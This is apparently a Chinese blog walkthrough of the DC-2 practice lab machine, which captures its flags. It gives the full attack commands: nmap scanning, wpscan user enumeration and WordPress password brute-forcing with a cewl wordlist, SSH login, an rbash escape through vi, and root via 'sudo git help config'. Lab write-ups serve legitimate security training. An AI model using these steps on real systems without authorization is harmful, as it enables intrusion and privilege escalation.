DC-2 渗透

  1. nmap进行主机扫描,发现存活主机192.168.85.169

nmap 192.168.85.0/24
DC-2 渗透_第1张图片

2.nmap对主机192.168.85.169进行端口扫描和服务扫描,发现还开放了7744是ssh服务,这题估计会用到ssh

nmap 192.168.85.169 -p1-65335
nmap -sV 192.168.85.169 -p1-65535
DC-2 渗透_第2张图片
DC-2 渗透_第3张图片

3.访问网站,发现跳转到dc-2了,无法访问,需要更改hosts文件,再次访问

DC-2 渗透_第4张图片

得到第一个flag

DC-2 渗透_第5张图片

让你使用cewl生成字典,进行暴力破解,cms为wordpress,可以进行目录爆破或者搜默认位置登录位置为wp-admin,尝试弱密码失败,但是知道用户名了是admin

DC-2 渗透_第6张图片

用cewl生成密码,再用burp跑没跑出来

4.站点cms是wordpress,有一款扫描工具wpscan,可以进行扫描用户,进行登录爆破

wpscan --url http://dc-2 -e u #跑用户名
DC-2 渗透_第7张图片

组成一个字典user.txt

使用cewl去跑,这里生成最小5位和6位的密码都可以

cewl http://dc-2 -w pass.txt 
cewl http;//dc-2 -m 5 pass.txt
cewl http://dc-2 -m 6 pass.txt
DC-2 渗透_第8张图片

使用wp-admin进行爆破

wpscan --url http://dc-2 -U user.txt -P pass.txt
DC-2 渗透_第9张图片

5.登录找到第二个flag

DC-2 渗透_第10张图片
DC-2 渗透_第11张图片

这句话意思是如果你不能攻下wordpress,且先走捷径,这里有另外一条路

希望你找到进入的方法

6.使用ssh进行登录

这个地方尝试进行了写木马,但是写入的是html代码,只能更改文章,而不能进行修改源码,上传文件一类的操作,结合前面的信息搜集7744为ssh服务

jerry登录失败,用tom登录,密码 parturient

DC-2 渗透_第12张图片

很多命令用不了

DC-2 渗透_第13张图片

rbash是一个受限的bash

7.找到flag3.txt

vi flag3.txt
DC-2 渗透_第14张图片

意思是tom总是比jerry跑的慢,大概可能他需要使用su去处理事情

8.需要提高tom的权限,su切换到jerry用户,进行rbash的vi提权

compgen -c   #查看可以使用的命令
# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
DC-2 渗透_第15张图片

9.找到flag4

DC-2 渗透_第16张图片

意思是你成功做到了这,但是这不是你的家,你仍然需要找到最后的flag,这是很重要的,这没有hints,你需要自己做,继续做吧,使用git走出这里

10.git提权

sudo -l              #查看可以执行那些命令
sudo git help config 
!/bin/sh             #进入命令行
whoami              #需要加!
DC-2 渗透_第17张图片

参考文章:

(12条消息) 【渗透测试】--- rbash逃逸方法简述_rbash 命令_通地塔的博客-CSDN博客

内网渗透DC-2靶场通关(CTF) - xzajyjs - 博客园 (cnblogs.com)

你可能感兴趣的:(靶机及靶场通关,网络安全)